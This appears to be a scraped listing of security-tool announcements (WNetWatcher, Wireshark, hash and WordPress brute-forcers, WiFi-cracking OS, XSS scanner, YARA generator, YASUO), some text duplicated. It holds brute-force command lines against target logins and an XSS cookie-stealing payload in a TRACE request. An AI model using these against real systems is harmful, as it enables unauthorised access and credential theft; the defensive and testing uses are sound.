    Wireless Network Watcher doesn't require any installation process or additional dll files. In order to start using it, simply extract the executable file (WNetWatcher.exe) from the zip file, and run it. 
    If you want, you can also download WNetWatcher with full install/uninstall support (wnetwatcher_setup.exe), so a shortcut for running WNetWatcher will be automatically added into your start menu.
    After running WNetWatcher, it automatically locates your wireless adapter, and scans your network. After a few seconds, you should start see the list of computers that are currently connected to your network.
    If from some reason, WNetWatcher failed to locate and scan your network, you can try to manually choosing the correct network adapter, by pressing F9 (Advanced Options) and choosing the right network adapter.

    Columns Description
    • IP Address: IP Address of the device or computer.
    • Device Name: The name of the device or computer. This field may remain empty if the computer or the device doesn't provide its name.
    • MAC Address: The MAC address of the network adapter.
    • Network Adapter Company: The company that manufactured the network adapter, according to the MAC Address. This column can help you to detect the type of the device or computer. For example, if the company name is Apple, the device is probably a Mac computer, iPhone, or iPad. 
      if the company name is Nokia, the device is probably a cellular phone of Nokia.

      By default, this utility uses an internal MAC addresses database stored inside the .exe file, but it's not always updated with the latest MAC address assignments. 
      You can manually download the latest MAC addresses file from http://standards.ieee.org/develop/regauth/oui/oui.txt and then put oui.txt in the same folder where WNetWatcher.exe is located. When you run WNetWatcher.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.
    • Device Information: This column displays 'Your Computer' if the device is the computer that you currently use. This column displays 'Your Router' if the device is the wireless router.
    • User Text: You can assign your own text to any device detected by WNetWatcher. By default, this field is filled with the device name. In order to change the User Text, simply double-click the item and type the desired text.
    • Active: Specifies whether this device is currently active. When a device is not detected anymore, the 'Active' value is turned from 'Yes' to 'No'
    Background Scan

    Starting from version 1.15, there is a new option under the Options menu - 'Background Scan'. 
    When it's turned on, Wireless Network Watcher first make the regular fast network scan to discover all current connected devices. After that, a continuous background scan is activated to discover when new devices are connected to your network. The background scan is slower and less intensive then the regular scan, so it won't overload your computer and you can leave it to run in the background while using other programs. 
    When the background scan is running, a counter of the scan process is displayed in the second section of the bottom status bar.
    When the background scan is used, you can use the 'Beep On New Device' option to get a beep sound when a new device is detected.

    Command-Line Options
    /cfg <Filename> Start Wireless Network Watcher with the specified configuration file. For example:
    WNetWatcher.exe /cfg "c:\config\wnw.cfg"
    WNetWatcher.exe /cfg "%AppData%\WNetWatcher.cfg"
    /stext <Filename> Scan your network, and save the network devices list into a regular text file.
    /stab <Filename> Scan your network, and save the network devices list into a tab-delimited text file.
    /scomma <Filename> Scan your network, and save the network devices list into a comma-delimited text file (csv).
    /stabular <Filename> Scan your network, and save the network devices list into a tabular text file.
    /shtml <Filename> Scan your network, and save the network devices list into HTML file (Horizontal).
    /sverhtml <Filename> Scan your network, and save the network devices list into HTML file (Vertical).
    /sxml <Filename> Scan your network, and save the network devices list into XML file.    



    Download Wireless Network Watcher v1.79

    Wireless Network Watcher v1.81 - Show Who is Connected to your Wireless Network


    Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

    For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

    You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

    Using Wireless Network Watcher

    Wireless Network Watcher doesn't require any installation process or additional dll files. In order to start using it, simply extract the executable file (WNetWatcher.exe) from the zip file, and run it.

    If you want, you can also download WNetWatcher with full install/uninstall support (wnetwatcher_setup.exe), so a shortcut for running WNetWatcher will be automatically added into your start menu.

    After running WNetWatcher, it automatically locates your wireless adapter, and scans your network. After a few seconds, you should start see the list of computers that are currently connected to your network.

    If from some reason, WNetWatcher failed to locate and scan your network, you can try to manually choosing the correct network adapter, by pressing F9 (Advanced Options) and choosing the right network adapter.

    Columns Description
    • IP Address: IP Address of the device or computer.
    • Device Name: The name of the device or computer. This field may remain empty if the computer or the device doesn't provide its name.
    • MAC Address: The MAC address of the network adapter.
    • Network Adapter Company: The company that manufactured the network adapter, according to the MAC Address. This column can help you to detect the type of the device or computer. For example, if the company name is Apple, the device is probably a Mac computer, iPhone, or iPad. 
      if the company name is Nokia, the device is probably a cellular phone of Nokia.

      By default, this utility uses an internal MAC addresses database stored inside the .exe file, but it's not always updated with the latest MAC address assignments. 
      You can manually download the latest MAC addresses file from http://standards.ieee.org/develop/regauth/oui/oui.txt and then put oui.txt in the same folder where WNetWatcher.exe is located. When you run WNetWatcher.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.
    • Device Information: This column displays 'Your Computer' if the device is the computer that you currently use. This column displays 'Your Router' if the device is the wireless router.
    • User Text: You can assign your own text to any device detected by WNetWatcher. By default, this field is filled with the device name. In order to change the User Text, simply double-click the item and type the desired text.
    • Active: Specifies whether this device is currently active. When a device is not detected anymore, the 'Active' value is turned from 'Yes' to 'No'

    Background Scan

    Starting from version 1.15, there is a new option under the Options menu - 'Background Scan'.

    When it's turned on, Wireless Network Watcher first make the regular fast network scan to discover all current connected devices. After that, a continuous background scan is activated to discover when new devices are connected to your network. The background scan is slower and less intensive then the regular scan, so it won't overload your computer and you can leave it to run in the background while using other programs.

    When the background scan is running, a counter of the scan process is displayed in the second section of the bottom status bar.

    When the background scan is used, you can use the 'Beep On New Device' option to get a beep sound when a new device is detected.

    Command-Line Options
    /cfg <Filename> Start Wireless Network Watcher with the specified configuration file. For example:
    WNetWatcher.exe /cfg "c:\config\wnw.cfg"
    WNetWatcher.exe /cfg "%AppData%\WNetWatcher.cfg"
    /stext <Filename> Scan your network, and save the network devices list into a regular text file.
    /stab <Filename> Scan your network, and save the network devices list into a tab-delimited text file.
    /scomma <Filename> Scan your network, and save the network devices list into a comma-delimited text file (csv).
    /stabular <Filename> Scan your network, and save the network devices list into a tabular text file.
    /shtml <Filename> Scan your network, and save the network devices list into HTML file (Horizontal).
    /sverhtml <Filename> Scan your network, and save the network devices list into HTML file (Vertical).
    /sxml <Filename> Scan your network, and save the network devices list into XML file.    


    Download Wireless Network Watcher v1.81

    Wireshark v2.0 - The World’s Foremost Network Protocol Analyzer


    Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

    Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

    Wireshark 2.0.0rc2 has been released. This is the second release candidate for Wireshark 2.0. Installers for Windows, OS X, and source code are now available.
    The following features are new (or have been significantly updated) since version 2.0.0rc1:
    • For new installations on UN*X, the directory for user preferences is $HOME/.config/wireshark rather than $HOME/.wireshark. If that directory is absent, preferences will still be found and stored under $HOME/.wireshark.
    • Qt port:
      • The SIP Statistics dialog has been added.
      • You can now create filter expressions from the display filter toolbar.
      • Bugs in the UAT prefererences dialog has been fixed.
    • Several dissector and Qt UI crash bugs have been fixed.
    • Problems with the Mac OS X application bundle have been fixed.
    The following features are new (or have been significantly updated) since version 1.99.9:
    • Qt port:
      • The LTE RLC Graph dialog has been added.
      • The LTE MAC Statistics dialog has been added.
      • The LTE RLC Statistics dialog has been added.
      • The IAX2 Analysis dialog has been added.
      • The Conversation Hash Tables dialog has been added.
      • The Dissector Tables dialog has been added.
      • The Supported Protocols dialog has been added.
      • You can now zoom the I/O and TCP Stream graph X and Y axes independently.
      • The RTP Player dialog has been added.
      • Several memory leaks have been fixed.

    Changes in Wireshark 2.0

    Capture options. Capture options have been simplified and consolidated. In 1.12 they are spread out in many places across several windows. In 2.0 they are in two places: the Capture Options dialog (Capture→Options or the “gear” icon in the toolbar) and the Manage Interfaces dialog, which you can open by pressing “Manage Interfaces” in the Capture Options dialog.

    Streamlined preferences. Preferences windows usually aren’t something to get excited about and this is no exception, but it’s important to note that in the process of removing clutter some preferences have been removed from the main window. They’re still available in the “Advanced” preference section which lists every available preference item.

    Translations. Thanks to the hard work of many contributors the new interface supports multiple languages. You can now select between Chinese, English, French, German, Italian, Japanese, and Polish in the “Appearance” preferences section. Many more translations are underway. You can see the status the translation efforts and help out with the effort at https://www.transifex.com/wireshark/wireshark/.

    Related packets. As you scroll through the packet list you might notice little symbols pop up along its left edge. For example, you might see left and right arrows for DNS requests and Replies, or a check mark to denote an ACKed TCP packet. These are related packets. This exposes some plumbing we’ve had in place for a long time, but it’s now shown in the main window instead of buried deep in the packet detail tree.

    Intelligent scrollbar. As you scroll through the packet list you might notice that the scroll bar itself looks odd. It now features a map of nearby packets, similar to the “minimap” available in many modern text editors. The number of packets shown in the map is the same as the number of physical vertical pixels in your scrollbar. The more pixels you have, the more packets you can see. In other words, if you use Wireshark regularly you now have a legitimate business case for a retina display.

    Statistics dialogs. The dialogs under the Statistics and Telephony menus have seen many improvements. The backend code has been consolidated so that most of Wireshark’s statistics now share common internal logic. This in turn let us create common UI code with many workflow improvements and a much more consistent interface.

    I/O Graph dialog. You can now graph as many items as you like and save graphs as PDF, PNG, JPEG, and BMP. Graph settings stay with your profile so you can customize them for multiple environments.

    Follow Stream dialog. You can now switch between streams and search for text.

    General dialogs. Many dialogs now have context-aware hints. For example the I/O Graph and Follow Stream dialogs will tell you which packet corresponds to the graph or stream data under your cursor. Most of them will stay open after you close a capture file so that you can compare statistics or graphs between captures.

    Woodpecker hash Bruteforce - Multithreaded program to perform a brute-force attack against a hash


    Woodpecker hash Bruteforce is a fast and easy-to-use multithreaded program to perform a brute-force attack against a hash. It supports many common hashing algorithms such as md5, sha1, etc. It runs on Windows and Mac OS. You can use dictionary, alphabet-based or random bruteforce.

    Here  you can download Woodpecker hash Bruteforce for Windows and Mac OS.

    How to use:
    1. Open cmd.exe on Windows or Terminal on Mac OS
    2. Drag downloaded file in the terminal
    3. Hit space (it it wasn't added automatically after the filename) and type “–help” (with two dashes)
    4. Some help will be shown to you
    5. You may want to run the examples first
    6. Start bruteforcing!
    Supported hash types:
    • MD2 – 32 characters
    • MD4 – 32 characters
    • MD5 – 32 characters
    • SHA1 – 40 characters
    • SHA224 – 56 characters
    • SHA256 – 64 characters
    • SHA384 – 96 characters
    • SHA512 – 128 characters
    Supported bruteforce types:
    • Dummy – using letter combinations of letters of given alphabet
    • Random – using random letter combinations of letters of given alphabet (use if other types do not succeed)
    • Wordlist-based – using words from given wordlist

    News
    • 22.02.2015 - Version 0.9.1 is here!
      1. Ability to start program by double-clicking it (beta)
      2. Bug fixes, stability and speed improvements
    • 20.02.2015 - Version 0.9 is out!
      1. Finally, Woodpecker hash Bruteforce is now multithreaded on both Windows and Mac OS!
      2. Bug fixes, stability, speed and interface improvements
    • 8.02.2015 - Version 0.8 is out!
      1. Ability to start interrupted session using '-R' flag
      2. New bruteforce type - random bruteforce using '-r' flag
      3. Results are now saved in case of sudden termination
      4. Bug fixes, stability, speed and interface improvements
    • 16.01.2015 - Version 0.7 published!
      1. Bug fixes and stability improvements (fixed the alphabet bug on Windows)
      2. Slight speed and logic improvements
    • 28.12.2014 - Added video tutorial in the bottom of the "Tutorial" page
    • 7.12.2014 - Version 0.6 published!
      1. Now works better with dictionaries and wordlists
      2. You can supply your own alphabet
      3. Now you are able to save results


    Download Woodpecker hash Bruteforce

    Wordbrutepress - Wordpress Brute Force Multithreading with Standard and XML-RPC Login Method

    Wordpress Brute Force Multithreading with standard and xml-rpc login method written in python.

    Features:
    1. Multithreading
    2. xml-rpc brute force mode
    3. http and https protocols support
    4. Random User Agent
    5. Big wordlist support

    Usage:
    Standard login request:
    
    python wordbrutepress.py -S -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]
    
    Xml-rpc login request:
    
    python wordbrutepress.py -X -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]

    CHANGELOG
     2015-11-20 v2.1
     1) Add new feature: Big wordlist support (thanks to guly @theguly)
     2) Fix faultcode check instead of "403" code for XML-RPC (thanks to guly @theguly)
    
     2015-04-12 v2.0
     1) Add new feature: xml-rpc brute force mode
     2) Fix minor bugs
    
     2015-04-11 v1.1
     1) optparse (Deprecated since version 2.7) replaced by argparse
     2) Fix connection bugs


    Download Wordbrutepress

    WPHardening 1.5 - Fortify the security of any WordPress installation


    Fortify the security of any WordPress installation.

    Installation

    Installing WPHardening requires you to execute one console command:
    $ pip install -r requirements.txt

    Usage
    $ python wphardening.py -h 
    
     __          _______  _    _               _            _
     \ \        / /  __ \| |  | |             | |          (_)
      \ \  /\  / /| |__) | |__| | __ _ _ __ __| | ___ _ __  _ _ __   __ _
       \ \/  \/ / |  ___/|  __  |/ _` | '__/ _` |/ _ \ '_ \| | '_ \ / _` |
        \  /\  /  | |    | |  | | (_| | | | (_| |  __/ | | | | | | | (_| |
         \/  \/   |_|    |_|  |_|\__,_|_|  \__,_|\___|_| |_|_|_| |_|\__, |
                                                                     __/ |
            Fortify the security of any WordPress installation.     |___/
    
               Sponsored by SYHUNT - http://www.syhunt.com
    
    Usage: python wphardening.py [options]
    
    Options:
      --version             show program's version number and exit
      -h, --help            show this help message and exit
      -v, --verbose         Active verbose mode output results
      --update              Check for WPHardening latest stable version
    
      Target:
        This option must be specified to modify the package WordPress.
    
        -d DIRECTORY, --dir=DIRECTORY
                            **REQUIRED** - Working Directory.
        --load-conf=FILE    Load file configuration.
    
      Hardening:
        Different tools to hardening WordPress.
    
        -c, --chmod         Chmod 755 in directory and 644 in files.
        -r, --remove        Remove files and directory.
        -b, --robots        Create file robots.txt
        -f, --fingerprinting
                            Deleted fingerprinting WordPress.
        -t, --timthumb      Find the library TimThumb.
        --chown=user:group  Changing file and directory owner.
        --wp-config         Wizard generated wp-config.php
        --plugins           Download Plugins Security.
        --proxy=PROXY       Use a HTTP proxy to connect to the target url for
                            --plugins and --wp-config.
        --indexes           It allows you to display the contents of directories.
        --minify            Compressing static file .css and .js
        --malware-scan      Malware Scan in WordPress project.
    
      Miscellaneous:
        -o FILE, --output=FILE
                            Write log report to FILE.log
    

    Examples

    Check a WordPress Project
    Before using the tool, we must ensure that our working directory is WordPress.
    $ python wphardening.py -d /home/path/to/wordpress -v

    Change permissions
    This option is to add the correct permissions to files and directories.
    $ python wphardening.py -d /home/path/to/wordpress --chmod -v

    Remove files that are not used
    Part of the fortification of any system is to remove those files, directories or components required.
    $ python wphardening.py -d /home/path/to/wordpress --remove -v

    Create your robots.txt file
    WordPress default does not incorporate the robots.txt file with this option poemos customize our robots.txt
    $ python wphardening.py -d /home/path/to/wordpress --robots -v
    For more information robots.txt

    Remove all fingerprinting and Version
    $ python wphardening.py -d /home/path/to/wordpress --fingerprinting -v

    Check a TimThumb library
    $ python wphardening.py -d /home/path/to/wordpress --timthumb -v

    Create Index file
    This file is created as a way to avoid sailing in a directory.
    $ python wphardening.py -d /home/path/to/wordpress --indexes -v

    Download Plugins security
    The following is a list of the most commonly used security plugins that you can download automatically:
    $ python wphardening.py -d /home/path/to/wordpress --plugins

    Wizard generated wp-config.php
    This command automatically creates a file called wp-config-wphardening.php which can then rename it.
    $ python wphardening.py -d /home/path/to/wordpress --wp-config

    WPHardening update
    With this option you can always have the latest version of WPHardening.
    $ python wphardening.py --update

    Use all options
    $ python wphardening.py -d /home/path/to/wordpress -c -r -f -t --wp-config --indexes --plugins -o /home/user/wphardening.log


    Download WPHardening 1.5

    WS-Attacker - Modular Framework for Web Services Penetration Testing


    XML-based SOAP Web Services are a widely used technology, which allows the users to execute remote operations and transport arbitrary data. It is currently adapted in Service Oriented Architectures, cloud interfaces, management of federated identities, eGovernment, or millitary services. The wide adoption of this technology has resulted in an emergence of numerous - mostly complex - extension specifications. Naturally, this has been followed by a rise in large number of Web Services attacks. 

    By implementing common web applications, the developers evaluate the security of their systems by applying different penetration testing tools. However, in comparison to the well-known attacks as SQL injection or Cross Site Scripting, there exist no penetration testing tools for Web Services specific attacks. With WS-Attacker we intend to close this gap and provide developers and penetration testers automatic methods for detecting Web Services specific attacks. The tool currently supports the following attacks:
    • SOAPAction Spoofing
    • WS-Addressing Spoofing
    • Various XML Denial of Service variants
    • XML Signature Wrapping

    Download WS-Attacker

    Xiaopan OS - Pentesting Distribution for Wireless Security Enthusiasts


    Xiaopan OS is an easy to use software package for beginners and experts that includes a number of advanced tools to penetrate wireless networks. Based on the Tiny Core Linux (TCL) operating system (OS), it has a slick graphical user interface (GUI) requiring no need for typing Linux commands. Xiaopan OS is Windows, Mac and Linux compatible and users can simply install and boot this ~70mb OS through a USB pen drive or in a virtual machine (VM) environment.

    Alternatives

    There are a number of professional operating systems that have been developed specifically for pentesting and security auditing which all are based on Linux. These include Kali, BackTrack and WiFiway. What sets Xiaopan OS apart from its competitors is that it Xiaopan OS is simple to use and just works, depending on a number of variables and providing you have all the right hardware of course.

    Tools

    Xiaopan OS includes a number of tools to hack WiFi Protected Setup (WPS), WiFI Protected Access (WPA) and Wireless Equivalent Privacy (WEP) encrypted networks:

    • Reaver: newly developed application with the ability to brute force crack WPS (WPA / WPA2) pins.
    • Inflator: this is the GUI version of command line reaver.
    • Aircrack-ng: the major backbone of many other Xiaopan tools including FeedingBottle (FB) and Minidwep with the ability to attack WPA networks through a dictionary attack and WEP networks through collecting and injecting packets.
    • FeedingBottle: so easy a baby could use it! FB is essentially the Aircrack-ng GUI and was created by Beini.
    • Minidwep: is similar to FB but has a better and similar GUI that is even easier to use than FB. The added advantage of Minidwep is that you can also run Reaver and Inflator from here as well.
    • Xfe: this is a simple file manager similar to say windows explorer

    Download Xiaopan OS

    XPL-SEARCH - Search Exploits In Multiple Exploit Databases


    XPL SEARCH
    Search exploits in multiple exploit databases!
     Exploit databases available:
     * Exploit-DB
     * MIlw0rm
     * PacketStormSecurity
     * IntelligentExploit
     * IEDB
     * CVE
    

    TO RUN THE SCRIPT
    PHP Version (cli) 5.5.8 or higher
     php5-cli         Lib
    cURL support      Enabled
     php5-curl        Lib
    cURL Version      7.40.0 or higher
    allow_url_fopen   On
    Permission        Writing & Reading
    

    ABOUT DEVELOPER
    Author_Nick       CoderPIRATA
    Author_Name       Eduardo
    Email             coderpirata@gmail.com
    Blog              http://coderpirata.blogspot.com.br/
    Twitter           https://twitter.com/coderpirata
    Google+           https://plus.google.com/103146866540699363823
    Pastebin          http://pastebin.com/u/CoderPirata
    Github            https://github.com/coderpirata/
    

    "CHANGELOG"
    0.1 - [02/07/2015]
    - Started.
    
    0.2 - [12/07/2015]
    - Added Exploit-DB.
    - Added Colors, only for linux!
    - Added Update Function.
    - "Generator" of User-Agent reworked.
    - Small errors and adaptations.
    
    0.3 - [22/07/2015]
    - Bugs solved.
    - Added "save" Function.
    - Added "set-db" function.
    
    0.4 - [05/08/2015]
    - Save function modified.
    - Added Scan with list.
    
    0.5 - [29/08/2015]
    - Added search by Author.
    
    0.6 - [09/09/2015]
    - Now displays the author of the exploit.
     * Does not work with IntelligentExploit.
    - Changes in search logs.
    
    0.7 - [11/09/2015]
    - Added search in CVE.
     * ID.
     * Simple search - id 6.
    - Bug in exploit-db search, "papers" fixed.
    - Added standard time of 60 seconds for each request.
    - file_get_contents() was removed from "browser()".
    - Code of milw00rm search has been modified.
    - Changes in search logs.
    - Added date.
    
    0.7.1 - [17/09/2015]
    - Bug in milw00rm solved
    
    0.8 - [05/10/2015]
    - Added shebang.
    - Commands "save", "save-log" and "save-dir" have been modified.
    - Added "no-db" option.
    - GETOPT() modified - Thanks Jack2.
    - Bug on save-dir solved.
    - Others minor bugs solved.
    

    Screenshot




    Download XPL-SEARCH

    Xplico v1.1.1 - Open Source Network Forensic Analysis Tool (NFAT)


    The goal of Xplico is extract from an internet traffic capture the applications data contained.

    For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. Xplico isn’t a network protocol analyzer. Xplico is an open source Network Forensic Analysis Tool (NFAT).

    Features
    • Protocols supported: HTTP, SIP, IMAP, POP, SMTP, TCP, UDP, IPv6, …;
    • Port Independent Protocol Identification (PIPI) for each application protocol;
    • Multithreading;
    • Output data and information in SQLite database or Mysql database and/or files;
    • At each data reassembled by Xplico is associated a XML file that uniquely identifies the flows and the pcap containing the data reassembled;
    • Realtime elaboration (depends on the number of flows, the types of protocols and by the performance of computer -RAM, CPU, HD access time, …-);
    • TCP reassembly with ACK verification for any packet or soft ACK verification;
    • Reverse DNS lookup from DNS packages contained in the inputs files (pcap), not from external DNS server;
    • No size limit on data entry or the number of files entrance (the only limit is HD size);
    • IPv4 and IPv6 support;
    • Modularity. Each Xplico component is modular. The input interface, the protocol decoder (Dissector) and the output interface (dispatcher) are all modules;
    • The ability to easily create any kind of dispatcher with which to organize the data extracted in the most appropriate and useful to you;

    Download Xplico

    XSSYA v2.0 - Cross Site Scripting Scanner & Vulnerability Confirmation


    XSSYA Cross Site Scripting Scanner & Vulnerability Confirmation written in python scripting language confirm the XSS Vulnerability in two method first work by execute the payload encoded to bypass Web Application Firewall which is the first method request and responseif it respond 200 it turn toMethod2which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie

    What have been changed?
    XSSYA v 2.0 has more payloads; library contains 41 payloads to enhance detection level
    XSS scanner is now removed from XSSYA to reduce false positive
     URLs to be tested used to not allow any character at the end of the URL except (/ - = -?) but now this limitation has been removed

    What’s new in XSSYA V2.0?
    Custom Payload 1 – You have the ability to Choose your Custom Payload Ex: and you can encode your custom payload with different types of encodings like (B64 – HEX – URL_Encode –- HEX with Semi Columns)
    (HTML Entities à Single & Double Quote only - brackets – And – or Encode all payload with HTML Entities) This feature will support also XSS vulnerability confirmation method which is you choose you custom payload and custom Encoding execute if response 200 check for same payload decoded in HTM code page.

    HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5 payloads

    XSSYA have a Library for the most vulnerable application with XSS – Cross site scripting and this library counting (Apache – WordPress – PHPmy Admin) If you choose apache application it give the CVE Number version of Apache which is affected and the link for CVE for more details so it will be easy to search for certain version that is affected with XSS

    XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that will be exist on the target Domain

    XSSYA check is the target is Vulnerable to XST (Cross Site Trace) which it sends custom Trace Request and check if the target domain is Vulnerable the request will be like this:
    TRACE / HTTP/1.0
    Host: demo.testfire.net
    Header1: < script >alert(document.cookie);

    XSSYA Features
    * Support HTTPS
    * After Confirmation (execute payload to get cookies)
    * Can be run in (Windows - Linux)
    * Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)
    *XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)
    * Support Saving The Web HTML Code Before Executing

    the Payload Viewing the Web HTML Code into the Screen or Terminal

    More details
    http://labs.dts-solution.com/xssya-forget-the-browser-for-xss-by-yehia-mamdouh/


    Download XSSYA v2.0

    yarGen - A Generator for Yara Rules (for malware researchers)


    yarGen is a generator for Yara rules.

    What does yarGen do?

    The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files.

    Since version 0.14.0 it uses naive-bayes-classifier by Mustafa Atik and Nejdet Yucesoy in order to classify the string and detect useful words instead of compression/encryption garbage.

    Since version 0.12.0 yarGen does not completely remove the goodware strings from the analysis process but includes them with a very low score. The rules will be included if no better strings can be found and marked with a comment /* Goodware rule */. Force yarGen to remvoe all goodware strings with --excludegood. Also since version 0.12.0 yarGen allows to place the "strings.xml" from PEstudio in the program directory in order to apply the blacklist definition during the string analysis process. You'll get better results.

    The rule generation process tries to identify similarities between the files that get analyzed and then combines the strings to so called "super rules". Up to now the super rule generation does not remove the simple rule for the files that have been combined in a single super rule. This means that there is some redundancy when super rules are created. You can supress a simple rule for a file that was already covered by super rule by using --nosimple.

    Installation
    1. Make sure you have at least 2GB of RAM on the machine you plan to use yarGen
    2. Clone the git repository
    3. Install all dependancies with sudo pip install pickle scandir lxml naiveBayesClassifier
    4. Unzip the goodware database (e.g. 7z x good-strings.db.zip.001)
    5. See help with python yarGen.py --help

    Memory Requirements

    Warning: yarGen pulls the whole goodstring database to memory and uses up to 2 GB of memory for a few seconds.

    Command Line Parameters

    usage: yarGen.py [-h] [-m M] [-g G] [-u] [-c] [-o output_rule_file]
                     [-p prefix] [-a author] [-r ref] [-l min-size] [-z min-score]
                     [-s max-size] [-rc maxstrings] [-nr] [-oe] [-fs size-in-MB]
                     [--score] [--inverse] [--nodirname] [--noscorefilter]
                     [--excludegood] [--nosimple] [--nomagic] [--nofilesize]
                     [-fm FM] [--noglobal] [--nosuper] [--debug]
    
    yarGen
    
    optional arguments:
      -h, --help           show this help message and exit
      -m M                 Path to scan for malware
      -g G                 Path to scan for goodware (dont use the database
                           shipped with yaraGen)
      -u                   Update local goodware database (use with -g)
      -c                   Create new local goodware database (use with -g)
      -o output_rule_file  Output rule file
      -p prefix            Prefix for the rule description
      -a author            Author Name
      -r ref               Reference
      -l min-size          Minimum string length to consider (default=8)
      -z min-score         Minimum score to consider (default=5)
      -s max-size          Maximum length to consider (default=128)
      -rc maxstrings       Maximum number of strings per rule (default=20,
                           intelligent filtering will be applied)
      -nr                  Do not recursively scan directories
      -oe                  Only scan executable extensions EXE, DLL, ASP, JSP,
                           PHP, BIN, INFECTED
      -fs size-in-MB       Max file size in MB to analyze (default=3)
      --score              Show the string scores as comments in the rules
      --inverse            Show the string scores as comments in the rules
      --nodirname          Don't use the folder name variable in inverse rules
      --noscorefilter      Don't filter strings based on score (default in
                           'inverse' mode)
      --excludegood        Force the exclude all goodware strings
      --nosimple           Skip simple rule creation for files included in super
                           rules
      --nomagic            Don't include the magic header condition statement
      --nofilesize         Don't include the filesize condition statement
      -fm FM               Multiplier for the maximum 'filesize' condition
                           (default: 5)
      --noglobal           Don't create global rules
      --nosuper            Don't try to create super rules that match against
                           various files
      --debug              Debug output
    

    Best Practice

    See the following blog post for a more detailed description on how to use yarGen for YARA rule creation: How to Write Simple but Sound Yara Rules

    Examples

    Use the shipped database (FAST) to create some rules
    python yarGen.py -m X:\MAL\Case1401

    Use the shipped database of goodware strings and scan the malware directory "X:\MAL" recursively. Create rules for all files included in this directory and below. A file named 'yargen_rules.yar' will be generated in the current directory.

    Show the score of the strings as comment

    yarGen will by default use the top 20 strings based on their score. To see how a certain string in the rule scored, use the "--score" parameter.
    python yarGen.py --score -m X:\MAL\Case1401

    Use only strings with a certain minimum score

    In order to use only strings for your rules that match a certain minimum score use the "-z" parameter. It is a good pratice to first create rules with "--score" and than perform a second run with a minimum score set for you sample set via "-z".
    python yarGen.py --score -z 5 -m X:\MAL\Case1401

    Preset author and reference
    python yarGen.py -a "Florian Roth" -r "http://goo.gl/c2qgFx" -m /opt/mal/case_441 -o case441.yar

    Exclude strings from Goodware samples
    python yarGen.py --excludegood -m /opt/mal/case_441

    Supress simple rule if alreay covered by a super rules
    python yarGen.py --nosimple -m /opt/mal/case_441

    Show debugging output
    python yarGen.py --debug -m /opt/mal/case_441

    Create a new goodware strings database
    python yarGen.py -c -g C:\Windows\System32

    Update the goodware strings database (append new strings to the old ones)
    python yarGen.py -u -g "C:\Program Files"

    Inverse rule creation (still beta)

    In order to create some inverse rules on goodware, you have to prepare a directory with subdirectories in which you include all versions of the files you want to create inverse rules for with their original name and in their original folder. If that sounds strange, let me give you an example.
    E.g. you want to create inverse rules for all Windows executables in the System32 folder, you have to create a goodware archive with the following directory structure:
    • G:\goodware
      • WindowsXP
        • System32 - all files
      • Windows2003
        • System32 - all files
      • Windows2008R2
        • System32 - all files
    yarGen than creates rules that identify e.g. file name "cmd.exe" in path ending with "System32" and checks if the file contains certain necessary strings. If the strings don't show up, the rule will fire. This indicates a replaced system file or malware file that tries to masquerade as a system file.
    python yarGen.py --inverse -oe -m G:\goodware\

    You can also instruct yarGen not to include the file path but solely rely on the filename.
    python yarGen.py --inverse -oe --nodirname -m G:\goodware\


    Download yarGen

    YASUO - Scans for Vulnerable & Exploitable 3rd-party Web Applications


    Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.

    While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on.

    If you search through Exploit-db, there are over 10,000 remotely exploitable vulnerabilities that exist in tons of web applications/front-ends and could allow an attacker to completely compromise the back-end server. These vulnerabilities range from RCE to malicious file uploads to SQL injection to RFI/LFI etc.

    Yasuo is built to quickly scan the network for such vulnerable applications thus serving pwnable targets on a silver platter.

    Setup / Install

    You would need to install the following gems:
    gem install ruby-nmap net-http-persistent mechanize colorize text-table

    Details

    Yasuo provides following command-line options:
    -r :: If you want Yasuo to perform port scan, use this switch to provide an IP address or IP range or an input file with new-line separated IP addresses
    -s :: Provide custom signature file. [./yasuo.rb -s mysignatures.yaml -f nmap.xml] [Default - signatures.yaml]
    -f :: If you do not want Yasuo to perform port scan and already have an nmap output in xml format, use this switch to feed the nmap output
    -n :: Tells Yasuo to not ping the host while performing the port scan. Standard nmap option.
    -p :: Use this switch to provide port number(s)/range
    -A :: Use this switch to scan all the 65535 ports. Standard nmap option.
    -b [all/form/basic] :: If the discovered application implements authentication, use this switch to brute-force the auth. "all" will brute-force both form & http basic auth. "form" will only brute-force form-based auth. "basic" will only brute-force http basic auth.
    -t :: Specify maximum number of threads
    -h :: Well, take a guess

    Examples

    ./yasuo -r 127.0.0.1 -p 80,8080,443,8443 -b form
    The above command will perform port scan against 127.0.0.1 on ports 80, 8080, 443 and 8443 and will brute-force login for all the applications that implement form-based authentication.
    ./yasuo -f my_nmap_output.xml -b all
    The above command will parse the nmap output file "my_nmap_output.xml" and will brute-force login for all the applications that implement form-based and http basic authentication.


    Download YASUO

    YaVol - GUI for Volatility Framework and Yara


    This is just another GUI for volatility and yara which could make someone's life easier. It is inteded for Incident responders for quick examination of a memory image. Results are stored in sqlite db for reuse.

    1. Installation

    Clone repo
    • git clone https://Ft44k@bitbucket.org/Ft44k/yavol.git
    • default forder for yara sigs is /yara_rules

    2. Prerequisites

